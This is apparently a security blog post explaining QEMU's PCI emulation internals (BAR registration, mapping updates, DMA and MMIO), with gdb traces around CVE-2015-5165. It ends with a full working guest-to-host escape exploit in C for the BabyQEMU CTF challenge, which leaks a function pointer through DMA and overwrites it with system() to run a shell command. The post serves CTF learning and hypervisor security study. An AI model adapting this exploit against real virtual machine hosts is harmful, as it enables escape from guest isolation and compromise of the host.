Introduction
In this post, I give an introduction to PCI device emulation in QEMU. I start with the function pci_register_bar, then cover PCI device registration and the update of BAR mappings. Building on that, I explain how RTL8139 performs DMA (Direct Memory Access) and how MMIO (Memory Mapped I/O) works.
I also strongly recommend reading references [1] and [2], which give further useful information about PCI devices in QEMU.
Function pci_register_bar
Let’s start with the realize function of RTL8139.
memory_region_init_io(&s->bar_io, OBJECT(s), &rtl8139_io_ops, s,
                      "rtl8139", 0x100);
memory_region_init_io(&s->bar_mem, OBJECT(s), &rtl8139_mmio_ops, s,
                      "rtl8139", 0x100);
pci_register_bar(dev, 0, PCI_BASE_ADDRESS_SPACE_IO, &s->bar_io);
pci_register_bar(dev, 1, PCI_BASE_ADDRESS_SPACE_MEMORY, &s->bar_mem);
After attaching the MemoryRegionOps to the newly initialized MemoryRegions, QEMU immediately registers those MemoryRegions as BARs of the PCI device.
Let us dig into this function and see what is going on there.
void pci_register_bar(PCIDevice *pci_dev, int region_num,
                      uint8_t type, MemoryRegion *memory)
{
    PCIIORegion *r;
    uint32_t addr;
    uint64_t wmask;
    pcibus_t size = memory_region_size(memory);

    assert(region_num >= 0);
    assert(region_num < PCI_NUM_REGIONS);
    if (size & (size-1)) {
        fprintf(stderr, "ERROR: PCI region size must be pow2 "
                "type=0x%x, size=0x%"FMT_PCIBUS"\n", type, size);
        exit(1);
    }

    r = &pci_dev->io_regions[region_num];
    r->addr = PCI_BAR_UNMAPPED;
    r->size = size;
    r->type = type;
    r->memory = NULL;

    wmask = ~(size - 1);
    addr = pci_bar(pci_dev, region_num);
    if (region_num == PCI_ROM_SLOT) {
        /* ROM enable bit is writable */
        wmask |= PCI_ROM_ADDRESS_ENABLE;
    }
    pci_set_long(pci_dev->config + addr, type);
    if (!(r->type & PCI_BASE_ADDRESS_SPACE_IO) &&
        r->type & PCI_BASE_ADDRESS_MEM_TYPE_64) {
        pci_set_quad(pci_dev->wmask + addr, wmask);
        pci_set_quad(pci_dev->cmask + addr, ~0ULL);
    } else {
        pci_set_long(pci_dev->wmask + addr, wmask & 0xffffffff);
        pci_set_long(pci_dev->cmask + addr, 0xffffffff);
    }
    pci_dev->io_regions[region_num].memory = memory;
    pci_dev->io_regions[region_num].address_space
        = type & PCI_BASE_ADDRESS_SPACE_IO
        ? pci_dev->bus->address_space_io
        : pci_dev->bus->address_space_mem;
}

typedef struct PCIIORegion {
    pcibus_t addr; /* current PCI mapping address. -1 means not mapped */
#define PCI_BAR_UNMAPPED (~(pcibus_t)0)
    pcibus_t size;
    uint8_t type;
    MemoryRegion *memory;
    MemoryRegion *address_space;
} PCIIORegion;
The main goal of this function is to prepare the newly initialized MemoryRegions for attachment to the PCI bus address space. It does not map anything yet; it only records what has to be mapped later. The function works in two steps.
In the first step, it retrieves the corresponding PCIIORegion and fills in its basic information (r->addr = PCI_BAR_UNMAPPED, r->size, r->type), then sets up the BAR's entries in config, wmask and cmask.
In the second step, it assigns memory and address_space: the MemoryRegion that was passed in, and the bus's I/O or memory address space depending on the BAR type.
These two steps tie into two important functions in pci.c: pci_qdev_realize (PCI device registration) and pci_update_mappings (PCI device update).
PCI device registration
To give an overview of this process, I set a breakpoint at pci_qdev_realize and got the following stack trace on the first hit.
Thread 1 "qemu-system-x86" hit Breakpoint 1, pci_qdev_realize (qdev=0x5555566045a0, errp=0x7fffffffd630) at /home/dango/Security/qemu/hw/pci/pci.c:1822
1822 {
(gdb) bt
#0 pci_qdev_realize at /qemu/hw/pci/pci.c:1822
#1 device_set_realized at /qemu/hw/core/qdev.c:1046
#2 property_set_bool at /qemu/qom/object.c:1667
#3 object_property_set at /qemu/qom/object.c:946
#4 object_property_set_qobject at /qemu/qom/qom-qobject.c:24
#5 object_property_set_bool at /qemu/qom/object.c:1015
#6 qdev_init_nofail at /qemu/hw/core/qdev.c:366
#7 pci_create_simple_multifunction at /qemu/hw/pci/pci.c:1893
#8 pci_create_simple at /qemu/hw/pci/pci.c:1904
#9 i440fx_init at /qemu/hw/pci-host/piix.c:331
#10 pc_init1 at /qemu/hw/i386/pc_piix.c:203
#11 pc_init_v2_4 at /qemu/hw/i386/pc_piix.c:489
#12 main at /qemu/vl.c:4510
The trace shows that PCI device initialization starts from the pc_init1 function. As discussed in my previous post, this function is also responsible for initializing RAM. The PCI initialization goes as follows:
if (pci_enabled) {
    pci_memory = g_new(MemoryRegion, 1);
    memory_region_init(pci_memory, NULL, "pci", UINT64_MAX);
    rom_memory = pci_memory;
} else {
    pci_memory = NULL;
    rom_memory = system_memory;
}

//some other code

if (pci_enabled) {
    pci_bus = i440fx_init(&i440fx_state, &piix3_devfn, &isa_bus, gsi,
                          system_memory, system_io, machine->ram_size,
                          below_4g_mem_size,
                          above_4g_mem_size,
                          pci_memory, ram_memory);
} else {
    pci_bus = NULL;
    i440fx_state = NULL;
    isa_bus = isa_bus_new(NULL, get_system_memory(), system_io);
    no_hpet = 1;
}
Next, let us look into pci_qdev_realize to see what happens there.
static void pci_qdev_realize(DeviceState *qdev, Error **errp)
{
    PCIDevice *pci_dev = (PCIDevice *)qdev;
    PCIDeviceClass *pc = PCI_DEVICE_GET_CLASS(pci_dev);
    Error *local_err = NULL;
    PCIBus *bus;
    bool is_default_rom;

    /* initialize cap_present for pci_is_express() and pci_config_size() */
    if (pc->is_express) {
        pci_dev->cap_present |= QEMU_PCI_CAP_EXPRESS;
    }

    bus = PCI_BUS(qdev_get_parent_bus(qdev));
    pci_dev = do_pci_register_device(pci_dev, bus,
                                     object_get_typename(OBJECT(qdev)),
                                     pci_dev->devfn, errp);
    if (pci_dev == NULL)
        return;

    //some other code
}
Here we reach the most important function of PCI initialization, do_pci_register_device, which does almost all of the work of initializing a PCI device.
/* -1 for devfn means auto assign */
static PCIDevice *do_pci_register_device(PCIDevice *pci_dev, PCIBus *bus,
                                         const char *name, int devfn,
                                         Error **errp)
{
    PCIDeviceClass *pc = PCI_DEVICE_GET_CLASS(pci_dev);
    PCIConfigReadFunc *config_read = pc->config_read;
    PCIConfigWriteFunc *config_write = pc->config_write;
    Error *local_err = NULL;
    AddressSpace *dma_as;

    //some sanity check

    pci_dev->bus = bus;
    pci_dev->devfn = devfn;
    dma_as = pci_device_iommu_address_space(pci_dev);

    memory_region_init_alias(&pci_dev->bus_master_enable_region,
                             OBJECT(pci_dev), "bus master",
                             dma_as->root, 0, memory_region_size(dma_as->root));
    memory_region_set_enabled(&pci_dev->bus_master_enable_region, false);
    address_space_init(&pci_dev->bus_master_as,
                       &pci_dev->bus_master_enable_region, name);

    pstrcpy(pci_dev->name, sizeof(pci_dev->name), name);
    pci_dev->irq_state = 0;
    pci_config_alloc(pci_dev);

    pci_config_set_vendor_id(pci_dev->config, pc->vendor_id);
    pci_config_set_device_id(pci_dev->config, pc->device_id);
    pci_config_set_revision(pci_dev->config, pc->revision);
    pci_config_set_class(pci_dev->config, pc->class_id);

    //some check

    pci_init_cmask(pci_dev);
    pci_init_wmask(pci_dev);
    pci_init_w1cmask(pci_dev);
    if (pc->is_bridge) {
        pci_init_mask_bridge(pci_dev);
    }
    pci_init_multifunction(bus, pci_dev, &local_err);
    if (local_err) {
        error_propagate(errp, local_err);
        do_pci_unregister_device(pci_dev);
        return NULL;
    }

    if (!config_read)
        config_read = pci_default_read_config;
    if (!config_write)
        config_write = pci_default_write_config;
    pci_dev->config_read = config_read;
    pci_dev->config_write = config_write;
    bus->devices[devfn] = pci_dev;
    pci_dev->version_id = 2; /* Current pci device vmstate version */
    return pci_dev;
}

struct PCIDevice {
    //other member variable
    AddressSpace bus_master_as;
    MemoryRegion bus_master_enable_region;
    //other member variable
};
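In do_pci_register_device, the MemoryRegion bus_master_enable_region and the AddressSpace bus_master_as are initialized. The region is an alias of the root of the device's DMA address space, it starts out disabled, and it serves as the root of bus_master_as, the address space that the device's DMA goes through.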
PCI device update
Besides the PCI devices that are present by default, there are devices that are added explicitly, such as RTL8139. The function pci_update_mappings is what maps the BARs of a PCI device into the PCI bus address space.
static void pci_update_mappings(PCIDevice *d)
{
    PCIIORegion *r;
    int i;
    pcibus_t new_addr;

    for(i = 0; i < PCI_NUM_REGIONS; i++) {
        r = &d->io_regions[i];

        /* this region isn't registered */
        if (!r->size)
            continue;

        new_addr = pci_bar_address(d, i, r->type, r->size);

        /* This bar isn't changed */
        if (new_addr == r->addr)
            continue;

        /* now do the real mapping */
        if (r->addr != PCI_BAR_UNMAPPED) {
            trace_pci_update_mappings_del(d, pci_bus_num(d->bus),
                                          PCI_FUNC(d->devfn),
                                          PCI_SLOT(d->devfn),
                                          i, r->addr, r->size);
            memory_region_del_subregion(r->address_space, r->memory);
        }
        r->addr = new_addr;
        if (r->addr != PCI_BAR_UNMAPPED) {
            trace_pci_update_mappings_add(d, pci_bus_num(d->bus),
                                          PCI_FUNC(d->devfn),
                                          PCI_SLOT(d->devfn),
                                          i, r->addr, r->size);
            memory_region_add_subregion_overlap(r->address_space,
                                                r->addr, r->memory, 1);
        }
    }

    pci_update_vga(d);
}
It traverses the array of PCIIORegions and, for each registered region, computes the address currently programmed into the BAR. If that address differs from the current mapping, it removes the old mapping (if there is one), records the new address in the PCIIORegion and, unless the BAR is now unmapped, adds the region's MemoryRegion as a subregion of r->address_space at that address.
Now let me verify the procedure above with RTL8139, and then go further into MMIO with BabyQEMU from XCTF HITB 2017.
RTL8139
My target is the call to pci_dma_read in the vulnerable function of CVE-2015-5165. I use the following gdb script to verify the procedure described above.
set pagination off
set logging redirect on
set logging on

break do_pci_register_device
commands
  p/x $rdi
  x/s $rdx
  cont
end

break pci_update_mappings
commands
  p/x $rdi
  set $name = ((struct PCIDevice *)($rdi))->name
  if (strcmp($name, "rtl8139") == 0)
    bt
  end
  cont
end

break pci_dma_read
commands
  p/x $rdi
  set $name = ((struct PCIDevice *)($rdi))->name
  if (strcmp($name, "rtl8139") == 0)
    bt
  end
  cont
end

run -kernel /home/dango/Kernel/linux-4.15.7/arch/x86/boot/bzImage -append "console=ttyS0 root=/dev/sda rw" -hda /home/dango/Kernel/Image/image03/qemu.img -enable-kvm -m 2G -nographic -netdev user,id=t0, -device rtl8139,netdev=t0,id=nic0 -netdev user,id=t1, -device pcnet,netdev=t1,id=nic1
The results, in chronological order, are as follows:
Thread 1 "qemu-system-x86" hit Breakpoint 1, do_pci_register_device (pci_dev=0x5555573cd140, bus=0x555556603910, name=0x555556371cc0 "rtl8139", devfn=-1, errp=0x7fffffffd7f0) at /home/dango/Security/qemu/hw/pci/pci.c:843
843 {
$6 = 0x5555573cd140
0x555556371cc0: "rtl8139"

Thread 1 "qemu-system-x86" hit Breakpoint 2, pci_update_mappings (d=0x5555573cd140) at /home/dango/Security/qemu/hw/pci/pci.c:1135
1135 for(i = 0; i < PCI_NUM_REGIONS; i++) {
$13 = 0x5555573cd140
#0 pci_update_mappings (d=0x5555573cd140) at /qemu/hw/pci/pci.c:1135
#1 pci_do_device_reset (dev=0x5555573cd140) at /qemu/hw/pci/pci.c:242
#2 pcibus_reset (qbus=0x555556603910) at /qemu/hw/pci/pci.c:270
#3 qbus_reset_one (bus=0x555556603910, opaque=0x0) at /qemu/hw/core/qdev.c:318
#4 qbus_walk_children (bus=0x555556603910, pre_devfn=0x0, pre_busfn=0x0, post_devfn=0x5555557d4494 <qdev_reset_one>, post_busfn=0x5555557d44b7 <qbus_reset_one>, opaque=0x0) at /qemu/hw/core/qdev.c:604
#5 qdev_walk_children (dev=0x555556602040, pre_devfn=0x0, pre_busfn=0x0, post_devfn=0x5555557d4494 <qdev_reset_one>, post_busfn=0x5555557d44b7 <qbus_reset_one>, opaque=0x0) at /qemu/hw/core/qdev.c:629
#6 qbus_walk_children (bus=0x555556416780, pre_devfn=0x0, pre_busfn=0x0, post_devfn=0x5555557d4494 <qdev_reset_one>, post_busfn=0x5555557d44b7 <qbus_reset_one>, opaque=0x0) at /qemu/hw/core/qdev.c:595
#7 qbus_reset_all (bus=0x555556416780) at /qemu/hw/core/qdev.c:330
#8 qbus_reset_all_fn (opaque=0x555556416780) at /qemu/hw/core/qdev.c:336
#9 qemu_devices_reset () at /qemu/vl.c:1722
#10 qemu_system_reset (report=false) at /qemu/vl.c:1735
#11 main (argc=19, argv=0x7fffffffde98, envp=0x7fffffffdf38) at /qemu/vl.c:4617

Thread 4 "qemu-system-x86" hit Breakpoint 3, pci_dma_read (dev=0x5555573cd140, addr=2033036384, buf=0x7fffd5405030, len=4) at /home/dango/Security/qemu/include/hw/pci/pci.h:696
696 return pci_dma_rw(dev, addr, buf, len, DMA_DIRECTION_TO_DEVICE);
$3777 = 0x5555573cd140
#0 pci_dma_read (dev=0x5555573cd140, addr=2033036384, buf=0x7fffd5405030, len=4) at /qemu/include/hw/pci/pci.h:696
#1 rtl8139_cplus_transmit_one (s=0x5555573cd140) at /qemu/hw/net/rtl8139.c:1985
#2 rtl8139_cplus_transmit (s=0x5555573cd140) at /qemu/hw/net/rtl8139.c:2412
#3 rtl8139_io_writeb (opaque=0x5555573cd140, addr=217 '\331', val=64) at /qemu/hw/net/rtl8139.c:2795
#4 rtl8139_ioport_write (opaque=0x5555573cd140, addr=217, val=64, size=1) at /qemu/hw/net/rtl8139.c:3353
#5 memory_region_write_accessor (mr=0x5555573cfb68, addr=217, value=0x7fffd54052f8, size=1, shift=0, mask=255, attrs=...) at /qemu/memory.c:450
#6 access_with_adjusted_size (addr=217, value=0x7fffd54052f8, size=1, access_size_min=1, access_size_max=4, access=0x55555564d8bc <memory_region_write_accessor>, mr=0x5555573cfb68, attrs=...) at /qemu/memory.c:506
#7 memory_region_dispatch_write (mr=0x5555573cfb68, addr=217, data=64, size=1, attrs=...) at /qemu/memory.c:1158
#8 address_space_rw (as=0x555555e96f20 <address_space_io>, addr=49369, attrs=..., buf=0x7ffff7fe9000 "@", len=1, is_write=true) at /qemu/exec.c:2451
#9 kvm_handle_io (port=49369, attrs=..., data=0x7ffff7fe9000, direction=1, size=1, count=1) at /qemu/kvm-all.c:1680
#10 kvm_cpu_exec (cpu=0x555556416c70) at /qemu/kvm-all.c:1849
#11 qemu_kvm_cpu_thread_fn (arg=0x555556416c70) at /qemu/cpus.c:979
#12 start_thread (arg=0x7fffd5408700) at pthread_create.c:465
#13 clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95
First, we can see do_pci_register_device registering the PCIDevice at 0x5555573cd140. Next comes the stack trace of a call to pci_update_mappings, here triggered by the device reset path. The debugging script also shows that this update does not happen only once; it is invoked multiple times. Finally, at the time pci_dma_read is invoked, the guest write that triggered it was dispatched through address_space_io, the address space used for I/O port communication.
Memory Mapped IO
Now let us get back to BabyQEMU from XCTF HITB 2017. The decompiled pci_hitb_realize shows something new.
#define PCI_BASE_ADDRESS_SPACE_IO 0x01
#define PCI_BASE_ADDRESS_SPACE_MEMORY 0x00

pci_hitb_realize(PCIDevice *dev, Error **errp)
{
    HITBState *s = HITB(dev);

    memory_region_init_io(&s->bar_mem, OBJECT(s), &hitb_mmio_ops, s,
                          "hitb-mmio", 0x100000uLL);
    pci_register_bar(dev, 0, PCI_BASE_ADDRESS_SPACE_MEMORY, &s->bar_mem);
}
From the code above, we can tell that s->bar_mem is registered as a memory BAR. According to pci_register_bar, it will therefore be mapped into the bus's memory address space (pci_dev->bus->address_space_mem) rather than the I/O address space.
Given this knowledge of QEMU internals, the exploit code from KITCTF seems a little verbose. Here is a simplified version of the final exploit, which removes some redundant code and checks from the original write-up. In the code below, I only map the device's MMIO region and replace the mapped dmabuf of the original with a buffer allocated on the heap. In the end, we get the same result as the write-up by KITCTF.
#include <assert.h>
#include <fcntl.h>
#include <inttypes.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <unistd.h>

#define DMA_BASE 0x40000
#define PAGE_SHIFT 12
#define PAGE_SIZE (1 << PAGE_SHIFT)
#define PFN_PRESENT (1ull << 63)
#define PFN_PFN ((1ull << 55) - 1)

unsigned char* iomem;        /* mmap of BAR 0 (resource0) */
unsigned char* dmabuf;       /* heap buffer used as DMA source/target */
uint64_t dmabuf_phys_addr;   /* guest-physical address of dmabuf */
int fd;                      /* /proc/self/pagemap */

void die(const char* msg)
{
    perror(msg);
    exit(-1);
}

uint32_t page_offset(uint32_t addr)
{
    return addr & ((1 << PAGE_SHIFT) - 1);
}

/* Look up the guest frame number of a guest-virtual address via pagemap. */
uint64_t gva_to_gfn(void *addr)
{
    uint64_t pme, gfn;
    size_t offset;

    /* one 8-byte pagemap entry per page: (addr >> 12) * 8 */
    offset = ((uintptr_t)addr >> 9) & ~7;
    lseek(fd, offset, SEEK_SET);
    if (read(fd, &pme, 8) != 8)
        die("read");
    if (!(pme & PFN_PRESENT))
        return -1;
    gfn = pme & PFN_PFN;
    return gfn;
}

uint64_t gva_to_gpa(void *addr)
{
    uint64_t gfn = gva_to_gfn(addr);
    assert(gfn != -1);
    return (gfn << PAGE_SHIFT) | page_offset((uint64_t)addr);
}

void iowrite(uint64_t addr, uint64_t value)
{
    *((uint64_t*)(iomem + addr)) = value;
}

uint64_t ioread(uint64_t addr)
{
    return *((uint64_t*)(iomem + addr));
}

void dma_setcnt(uint32_t cnt)
{
    iowrite(144, cnt);
}

void dma_setdst(uint32_t dst)
{
    iowrite(136, dst);
}

void dma_setsrc(uint32_t src)
{
    iowrite(128, src);
}

void dma_start(uint32_t cmd)
{
    iowrite(152, cmd | 1);
}

/* Copy len bytes from the device buffer at addr into dmabuf. */
void dma_read(uint64_t addr, size_t len)
{
    dma_setsrc(addr);
    dma_setdst(dmabuf_phys_addr);
    dma_setcnt(len);
    dma_start(2);
    sleep(1);
}

/* Copy len bytes from buf into the device buffer at addr. */
void dma_write(uint64_t addr, const void* buf, size_t len)
{
    assert(len < 0x1000);
    memcpy(dmabuf, buf, len);
    dma_setsrc(dmabuf_phys_addr);
    dma_setdst(addr);
    dma_setcnt(len);
    dma_start(0);
    sleep(1);
}

void dma_write_qword(uint64_t addr, uint64_t value)
{
    dma_write(addr, &value, 8);
}

uint64_t dma_read_qword(uint64_t addr)
{
    dma_read(addr, 8);
    return *((uint64_t*)dmabuf);
}

void dma_crypted_read(uint64_t addr, size_t len)
{
    dma_setsrc(addr);
    dma_setdst(dmabuf_phys_addr);
    dma_setcnt(len);
    dma_start(4 | 2);
    sleep(1);
}

int main(int argc, char *argv[])
{
    int fdmem = open("/sys/devices/pci0000:00/0000:00:04.0/resource0", O_RDWR | O_SYNC);
    if (fdmem == -1)
        die("open");

    iomem = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, fdmem, 0);
    if (iomem == MAP_FAILED)
        die("mmap");

    fd = open("/proc/self/pagemap", O_RDONLY);
    if (fd < 0)
        die("open");

    printf("iomem @ %p\n", iomem);

    dmabuf = malloc(0x1000);
    if (dmabuf == NULL)
        die("malloc");
    /* touch the whole buffer so that it is present in pagemap */
    memset(dmabuf, '\x00', 0x1000);
    dmabuf_phys_addr = gva_to_gpa(dmabuf);
    printf("DMA buffer (virt) @ %p\n", dmabuf);
    printf("DMA buffer (phys) @ %p\n", (void*)dmabuf_phys_addr);

    /* leak the enc function pointer stored right after the DMA buffer */
    uint64_t hitb_enc = dma_read_qword(DMA_BASE + 0x1000);
    uint64_t binary = hitb_enc - 0x283dd0;
    printf("binary @ 0x%" PRIx64 "\n", binary);

    /* overwrite it with system and trigger it on our command string */
    uint64_t system = binary + 0x1fdb18;
    dma_write_qword(DMA_BASE + 0x1000, system);

    const char* payload = "cat flag;";
    dma_write(DMA_BASE + 0x100, payload, strlen(payload));
    dma_crypted_read(DMA_BASE + 0x100, 0x1);
    return 0;
}
The last remaining question is why we need to open “/sys/devices/pci0000:00/0000:00:04.0/resource0” for MMIO. The answer lies in the PCI address of the device.
Install pciutils in the guest and run “lspci”. We get the following result.
root@ubuntu:~# lspci
00:00.0 Host bridge: Intel Corporation 440FX - 82441FX PMC [Natoma] (rev 02)
00:01.0 ISA bridge: Intel Corporation 82371SB PIIX3 ISA [Natoma/Triton II]
00:01.1 IDE interface: Intel Corporation 82371SB PIIX3 IDE [Natoma/Triton II]
00:01.3 Bridge: Intel Corporation 82371AB/EB/MB PIIX4 ACPI (rev 03)
00:02.0 VGA compatible controller: Device 1234:1111 (rev 02)
00:03.0 Ethernet controller: Intel Corporation 82540EM Gigabit Ethernet Controller (rev 03)
00:04.0 Unclassified device [00ff]: Device 1234:2333 (rev 10)
From the result above, we can see that the address “00:04.0” is assigned to the unclassified device 1234:2333, which is the device targeted by our exploit. Therefore, we have to open the file “/sys/devices/pci0000:00/0000:00:04.0/resource0”, which exposes BAR 0 of that device, for exploitation.
Conclusion
In this post, I gave a detailed explanation of PCI devices in a QEMU machine. I then used two examples (one for DMA and one for MMIO) to show more details of how QEMU implements PCI emulation.
I think this will be my last post on QEMU internals. So far I have tried to answer the questions that are most likely to arise during the exploitation of QEMU.
Reference
[1] http://nairobi-embedded.org/mmap_mmio_dma.html
[2] http://nairobi-embedded.org/linux_pci_device_driver.html